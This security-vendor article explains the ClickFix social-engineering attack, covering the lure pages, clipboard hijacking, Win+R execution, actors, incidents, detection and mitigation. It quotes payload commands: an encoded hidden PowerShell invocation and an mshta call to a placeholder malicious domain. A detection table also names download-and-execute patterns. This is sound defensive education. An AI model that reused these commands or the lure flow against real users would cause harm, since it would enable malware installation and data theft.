What Is ClickFix?
ClickFix is a social engineering technique that manipulates victims into voluntarily executing malicious commands on their own devices. No exploit, no suspicious attachment — just a web page with seemingly official instructions and a victim who presses Enter.
This is not a technical vulnerability. It is an attack on human psychology — far more difficult for conventional security technology to block, because the user themselves becomes the 'last-mile executor' of the attack.
World's #2 Attack Vector (H1 2025)
ClickFix accounts for ~8% of all attacks blocked globally, making it the second-largest attack vector worldwide after conventional phishing. Growth in H1 2025 vs H2 2024: +517% (ESET Threat Report H1 2025).
How ClickFix Works — Step-by-Step
ClickFix succeeds because its presentation is convincing and its instructions feel routine. Here is the complete anatomy of this attack from initial contact to infection.
Initial Lure — Directing the Victim to a Malicious Page
Victims are directed to a malicious web page through various delivery channels:
- Phishing emails containing links that appear legitimate
- Malvertising — malicious ads on streaming or illegal download sites
- SEO poisoning — malicious sites ranking high in search results
- Compromised WordPress sites
- Fake GitHub issue notifications
- Forums or social media promoting cracked software
Fake Verification Page — The Convincing Deception
The page displays a lure that appears highly convincing, including:
- Fake reCAPTCHA/CAPTCHA: 'Click I\'m not a robot to continue'
- Fake Cloudflare Turnstile: 'Bot protection verification required'
- Browser error: 'Your browser cannot display this content'
- Fake Google Meet/Teams/Zoom: 'Your microphone has an issue, run the repair tool'
- Fake Windows BSOD: a full blue screen display with 'repair' instructions
Clipboard Hijacking — Silent Malicious Injection
When the victim clicks a button ('I\'m not a robot', 'Fix It', 'Verify'), JavaScript embedded in the page automatically copies a malicious command to the victim's clipboard — without their knowledge. The malicious code is placed at the beginning of the string while non-executable 'comments' are appended at the end to obscure the clipboard contents.
User Execution via Win+R — The Victim Runs the Command Themselves
A pop-up appears with seemingly official instructions: 'Press Windows+R, then press Ctrl+V, then press Enter to complete verification.' The victim follows these instructions without realizing they have just executed a malicious command in their Windows terminal. On macOS, victims are directed to open Terminal and paste a bash/curl command.
Payload Download — Fetching the Malware
The executed command typically takes the form of an encoded PowerShell command or MSHTA that downloads a payload from the attacker's server. Real-world examples from Group-IB analysis:
- powershell.exe -eC [BASE64_ENCODED_COMMAND]
- powershell.exe -WindowStyle Hidden -EncodedCommand [...]
- mshta.exe 'https://malicious-domain.com/payload'
Multi-Stage Delivery — Fileless, Layered Infection
The loader fetches a second stage from a rotating domain. The second stage establishes persistence (registry, scheduled task), attempts to disable protections, and injects the final payload into legitimate Windows processes (such as explorer.exe). The final payload — typically an infostealer or RAT — runs entirely in memory without writing files to disk, evading many traditional antivirus solutions.
History & Evolution of ClickFix
ClickFix did not emerge overnight. It evolved gradually from a simple trick into the preferred tool of nation-state espionage groups.
| Period | Key Event |
|---|---|
| October 2023 | First detection — a simple variant impersonating Cloudflare anti-bot. Not yet named 'ClickFix' |
| March 2024 | Proofpoint documents it extensively. TA571 and ClearFake cluster become early adopters. The name 'ClickFix' enters use |
| May 2024 | ClearFake integrates ClickFix + EtherHiding (payload hidden in BNB Chain smart contracts). Payload: Emmenhtal Loader and Lumma Stealer |
| August 2024 | Mass adoption. SmartApeSG distributes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT via ClickFix |
| October 2024 | APT28 (Russia) begins using ClickFix — the first time this criminal technique is adopted by a nation-state actor |
| November 2024 | MuddyWater (Iran) attacks 39+ Middle Eastern organizations with ClickFix |
| December 2024 | UNK_RemoteRogue (Russia) targets defense weapons manufacturers |
| Jan–Feb 2025 | Kimsuky (North Korea) begins using ClickFix to target DPRK policy think tanks |
| H1 2025 | ESET reports +517% surge. ClickFix becomes the world's second-largest attack vector |
| June 2025 | Researcher mr.d0x introduces FileFix — a ClickFix evolution using the Windows File Explorer address bar. 14 days later it appears in live attacks |
| Q1 2026 | Seven active variants identified: ClickFix original, TerminalFix, DownloadFix, FileFix, ClickFake Interview, CrashFix, and the macOS Matryoshka variant |
Who Is Using ClickFix?
What makes ClickFix especially alarming is not just its prevalence, but who is using it. Within a 90-day window between October 2024 and January 2025, five nation-state groups from four different countries adopted this technique — an unprecedented rate of criminal-to-state-actor technology transfer.
Criminal Actors
- TA571 — Initial Access Broker, first ClickFix adopter
- ClearFake — Fake browser update + EtherHiding
- SmartApeSG (ZPHP) — Multi-payload delivery chain
- Storm-1865 — Global Booking.com campaign
- Storm-1607 — Tens of thousands of emails to US & Canada
- Interlock Group — Ransomware targeting healthcare sector
Nation-State / APT
- APT28 (Russia) — Espionage via fake Google Spreadsheet
- UNK_RemoteRogue (Russia) — Targeting defense weapons manufacturers
- MuddyWater (Iran) — 39+ organizations in the Middle East
- Kimsuky (North Korea) — DPRK policy think tanks
- APT36 / Transparent Tribe (Pakistan) — Confirmed May 2025
Malware Delivered via ClickFix
ClickFix is payload-agnostic — it is simply a delivery mechanism. Once the victim executes the command, virtually any type of malware can be deployed. This is what makes it so dangerous: a single social engineering technique can result in data theft, ransomware, or espionage operations.
Lumma Stealer
InfostealerThe most common payload — responsible for 51% of ClickFix infections. Steals browser credentials, crypto wallets, session cookies, and 2FA codes.
NetSupport RAT
RATA Remote Access Trojan that leverages the legitimate NetSupport Manager tool to conceal its activity from security detection.
Interlock Ransomware
RansomwareThe Interlock group uses ClickFix as initial access before deploying ransomware in the healthcare sector — DaVita and Kettering Health are confirmed victims.
QuasarRAT
EspionageAn open-source RAT used by Kimsuky (North Korea) for espionage operations against DPRK policy think tanks in the US and Japan.
DarkGate & Latrodectus
LoaderMulti-function modular loaders that can download additional payloads, establish persistence, and operate as long-term backdoors.
AMOS (Atomic macOS Stealer)
macOSA macOS-specific variant that steals browser credentials, crypto wallets, and other sensitive data — ClickFix is not exclusively a Windows threat.
Documented Real-World Incidents & Campaigns
ClickFix is not merely a theoretical technique. The following are well-documented campaigns and incidents that demonstrate the real-world impact of these attacks across industries and geographies.
DaVita Ransomware — March 2025
HealthcareThe second-largest kidney dialysis provider in the US. Initial intrusion via ClickFix on March 24, 2025, detected April 12. Interlock ransomware claimed 1.5 TB of stolen data — 2.7 million patient records exposed.
Kettering Health — May 2025
Healthcare14 hospitals and 120+ clinics across the US Midwest. An Interlock ransomware attack via ClickFix caused thousands of medical procedures to be cancelled. Patient data, medical records, bank statements, and passport scans were stolen.
Storm-1865 Booking.com — Dec 2024
HospitalityFake emails from 'Booking.com' to hotel staff regarding 'negative guest reviews'. Targets: South Asia, Southeast Asia, North America, Oceania, Europe. Payloads: XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot.
APT28 Espionage — October 2024
Nation-StateRussia (APT28) impersonated Google Spreadsheet with a fake reCAPTCHA. When victims 'verified', they unknowingly opened an SSH tunnel to a Metasploit server — used for espionage operations.
MuddyWater / Iran — November 2024
Nation-StateDeliberately launched to coincide with Microsoft Patch Tuesday to make 'security alert' emails appear credible. Attacked 39+ financial and government organizations in the Middle East using Level RMM tools for espionage.
Kimsuky / North Korea — Jan 2025
EspionageImpersonated Japanese diplomatic correspondence to deceive DPRK policy think tank researchers in the US, Japan, and South Korea. Victims saw a decoy PDF while QuasarRAT was silently installed in the background.
Statistics & Prevalence 2025
The following quantitative data illustrates the massive scale of ClickFix adoption in a short period — from a niche technique to a global threat faced by nearly every organization.
+517%
Attack growth in H1 2025 vs H2 2024
ESET Threat Report
#2
Largest attack vector globally after conventional phishing
ESET H1 2025
~8%
Of all attacks blocked globally (H1 2025)
ESET
47%
Of Microsoft Defender Experts initial access notifications involved ClickFix
Microsoft
5 APT
Nation-state groups from 4 different countries within 90 days
Proofpoint
51%
Of ClickFix infections delivered Lumma Stealer as the primary payload
Industry Analysis
Why Do Users Fall Victim?
ClickFix succeeds not because of technology failure, but because it exploits how the human brain works. Understanding these psychological factors is the first step in building effective security awareness.
Verification Fatigue
Years of CAPTCHAs and security prompts have conditioned users to complete them automatically without scrutiny. They are perceived as 'routine obstacles', not danger signals.
Authority Mimicry
ClickFix pages impersonate trusted services with pixel-perfect accuracy: Google reCAPTCHA, Cloudflare, Booking.com, Microsoft Office. Trust in these brands transfers to the fraudulent page.
Problem-Solution Framing
ClickFix always presents a 'problem' (browser error, video won't load) along with a 'solution' that appears easy and logical. The human brain instinctively seeks to resolve problems.
Urgency Creation
Countdown timers, fake counters ('127 users have already verified'), and warnings that 'your account will be suspended' create psychological pressure that reduces critical thinking capacity.
Exploiting Security Awareness
Users who are already 'phishing-aware' are vigilant about attachments. ClickFix uses no attachments — it is a normal web page with technical instructions. Conventional cognitive defenses do not apply.
Illusion of Control
Victims feel they are 'in control' because they are the ones choosing to press the button. In reality, they are being manipulated. This is psychologically far more effective than a drive-by download.
How to Detect ClickFix Attacks
ClickFix is designed to evade traditional detection because no malicious file is downloaded initially — only a user executing a command. However, there are several artifacts and signals that can be detected.
| Detection Method | What to Look For | Tool/Platform |
|---|---|---|
| Registry Audit | RunMRU key containing PowerShell, mshta, certutil, Base64 strings, or -WindowStyle Hidden | Windows Registry / SIEM |
| Windows Event ID 4688 | powershell.exe or mshta.exe spawned by explorer.exe (not an IDE or terminal) | Windows Event Log / SIEM |
| PowerShell Script Block (Event 4104) | EncodedCommand, DownloadString, Invoke-Expression, or download URLs within scripts | PowerShell Logging / SIEM |
| EDR Behavioral Detection | Process chain: explorer.exe → powershell.exe → mshta.exe / certutil.exe / bitsadmin.exe | EDR / XDR Platform |
| Network Detection | Outbound connections to new domains (<30 days old), PowerShell with unusual user-agent, DNS queries to unknown domains | Firewall / IDS / DNS Filter |
| Threat Intel Integration | IoCs from Recorded Future Risk Lists, VirusTotal, ANY.RUN for active ClickFix-related domains and hashes | SIEM / Threat Intel Feed |
ClickFix Prevention & Mitigation
No single control is sufficient to stop ClickFix. A combination of technical hardening, personnel training, and layered detection capabilities is required.
Security Awareness Training
Train users to NEVER execute commands from web page instructions. Show real examples of ClickFix pages. Communicate clearly: 'No legitimate CAPTCHA will ever ask you to open the Run dialog or a Terminal.'
Disable Windows Run Dialog via GPO
User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu. This eliminates the primary execution vector for ClickFix.
PowerShell Hardening
Apply Constrained Language Mode, enable Script Block Logging and Transcription Logging, and set Execution Policy to AllSigned or Restricted for non-administrator users.
Block mshta.exe for Standard Users
MSHTA is a Living Off the Land Binary (LOLBIN) favored by ClickFix. Deploy AppLocker or WDAC to prevent its execution by non-administrator users.
Deploy EDR with Behavioral Protection
Ensure your EDR can detect suspicious process chains and is updated with the latest ClickFix signatures. Behavioral detection is far more effective than signature-based approaches for this threat.
DNS Filtering & Web Proxy
Block known malicious domains, newly registered domains (<30 days), and uncategorized sites. A Malicious Domain Blocking and Reporting (MDBR) service provides an additional layer of protection.
Email Security with URL Sandboxing
Filter emails containing links to new domains, sandbox URLs before users can click them, and enforce SPF/DKIM/DMARC to prevent domain spoofing.
Application Allowlisting
Whitelist approved applications and block unknown executables from %APPDATA%, %TEMP%, and other directories commonly used by ClickFix loaders.
Southeast Asia & Indonesia Threat Landscape
While no fully documented ClickFix campaign has exclusively targeted Indonesia, several major campaigns have explicitly named Southeast Asia as a target region — and Indonesia's risk factors are highly significant.
The Storm-1865 campaign impersonating Booking.com (December 2024 – March 2025) explicitly targeted 'South and Southeast Asia' alongside North America, Oceania, and Europe. Given the scale of Indonesia's hospitality and tourism industry, the potential impact is very real.
Indonesia's Risk Factors to Watch
210+ million internet users, a massive and increasingly digital SME sector, a large hospitality industry that was an explicit Storm-1865 target, security awareness that still needs improvement, and widespread use of global services (Google, Microsoft) that are ideal ClickFix impersonation targets. During Ramadan/Eid, phishing — including ClickFix-based techniques — increases by 30% according to LKDI data.
2×
Cyber attacks in Southeast Asia doubled in 2024 vs 2023
Positive Technologies
57,000+
Ransomware incidents in Asia Pacific in H1 2024
Industry Report
Top 6
Indonesia ranks among the most ransomware-impacted countries in Southeast Asia
Regional Analysis
ClickFix requires no exploit — only psychological manipulation. CloudSphere helps your organization test its resilience against social engineering attacks through Security Assessment & VAPT.
Share Article
Related Topics
Related Articles
Threat Intelligence
Threat Intelligence: Cara Kerja, Jenis, dan Implementasi di Organisasi Modern
30 Juni 2026
Endpoint Security
Implementasi Endpoint Security di Organisasi: Dari Dasar hingga Strategi Berlapis
29 Juni 2026
VAPT
Panduan VAPT & Penetration Testing: Cara Menguji Keamanan Sebelum Penyerang Melakukannya
29 Juni 2026
